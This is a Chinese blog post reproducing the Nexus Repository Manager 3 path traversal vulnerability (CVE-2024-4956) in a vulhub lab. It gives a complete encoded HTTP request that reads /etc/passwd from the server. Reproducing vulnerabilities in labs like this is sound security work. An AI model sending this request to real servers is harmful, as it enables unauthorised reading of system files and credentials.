vulhub中Nexus Repository Manager 3 未授权目录穿越漏洞(CVE-2024-4956)

最新推荐文章于 2024-07-10 20:03:15 发布
最新推荐文章于 2024-07-10 20:03:15 发布
阅读量409 收藏 6
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/139386032
版权

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。

其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。

环境启动后,访问`http://your-ip:8081`即可看到Nexus的默认页面。

漏洞复现

与Orange Tsai在[Blackhat US 2018](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)分享的SpringMVC CVE-2018-1271漏洞类似,Jetty的URIUtil.canonicalPath()函数也将空字符串认为是一个合法目录,导致了该漏洞的产生:

发送如下请求来复现漏洞:
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

可见,/etc/passwd已被成功读取:

余生有个小酒馆
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
0xSec
05-23 1067
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
Nexus远程命令执行漏洞复现(CVE-2019-7238)
最新发布
qq_62056583的博客
07-10 488
漏洞是由于代码基于OrientDB自定义函数的任意JEXL表达式执行功能,所以我们可以通过构造一个.jar包将请求拦截到burpsuite并构造payload来实现一个代码注入,当然我们可攻击的方面不止于此还可以将靶机反弹shell等恶意的攻击行为。
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1148
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
nexus开启匿名访问Anonymous Access,访问maven元数据maven-metadata,报401授权Unauthorized错误
天草二十六
07-02 365
开启匿名访问后,再次访问maven-metadata.xml,不再让我们输入用户名和密码了。这时,android打包成功,不再报错401授权Unauthorized了。
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
MDSEC的博客
08-18 342
​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在授权访问漏洞,将可以导致任意命令执行漏洞。然后在虚拟机上检验是否成功。这样漏洞复现就完成了。微信公众号:猫蛋儿安全
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
MD@@nr丫卡uer
02-24 160
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238) 前言 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在授权访问漏洞,将可以导致任意命令执行漏洞。 影响版本 Nexus Repository Manager OSS/Pro 3.6.2版本-3.14.0版本 漏洞复现
Nexus 3越权漏洞(CVE-2020-11444)
m0_65150886的博客
02-18 670
Nexus Repository Manager 3.x OSS / Pro <= 3.21.1Nexus 3的版本,存在任意修改admin密码越权漏洞,攻击者可以用低权限用户登录获取sessionID越权进行修改admin用户的密码。Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。3.F12,打开开发者模式,在应用程序查找NXSESSIONID。1.访问http://ip:port,出现如下页面,开始实验。2.点击登录,输入默认账号密码进行登录。
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven央仓库下载所需要的构件...
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
CVE-2019-7238:CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
nexus-repository-apt:Nexus Repository 3插件,允许使用apt信息库
02-26
APT现在是Nexus Repository Manager的一部分。 默认情况下,版本3.17.0包含APT插件。 插件源代码现在位于 归档问题:如果使用3.17.0或更高版本,请在提交所有问题。 升级到3.17.0:如果您是升级到3.17的现有...
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204)
EC_Carrot的博客
07-15 356
漏洞复现 Nexus Repository Manager 3的3.21.1及之前版本,存在一处任意EL表达式注入漏洞,这个漏洞CVE-2018-16621的绕过 该漏洞需要访问更新角色或创建角色接口,所以我们需要登陆后台 登陆后台后获取当前Cookie和CSRF Token,并修改以下包: POST /service/extdirect HTTP/1.1 Host: your_ip:8081 Content-Length: 223 X-Requested-With: XMLHttpRequest X-
nexus下载提示无权限
weixin_42555971的博客
07-09 1131
401
Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现
EC_Carrot的博客
03-04 1667
漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在授权访问漏洞,将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3由于存在访问控制措施的不足,授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的
Nexus Repository Manager 3 远程命令执行(CVE-2019-7238)复现
thelostworld
03-28 599
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238)复现相关实战项目遇到,本地搭建环境测试,尝试多种利用方式。一、漏洞背景Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功...
【已复现】Sonatype Nexus Repository 3 路径遍历漏洞(CVE-2024-4956)安全风险通告
smellycat000的专栏
05-23 225
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Sonatype Nexus Repository 3 路径遍历漏洞漏洞编号QVD-2024-18749,CVE-2024-4956公开时间2024-05-16影响量级十万级奇安信评级高危CVSS 3.1分数7.5威胁类型信息泄露利用可能性高POC状态已公开在野利用状态发现EXP状态已公开技术细节状态已公开危害描述:经身份认证的远程攻...
Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956
m0_46699477的博客
05-23 361
【代码】Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956
nexus repository manager
03-16
Nexus Repository Manager是一款开源的仓库管理器,主要用于管理和分发软件包、组件和其他二进制文件。它支持多种仓库类型,包括Maven、npm、Docker、RubyGems等,可以帮助开发者更好地管理和共享代码库。Nexus Repository Manager还提供了丰富的安全和权限控制功能,可以确保仓库的文件得到保护和授权访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值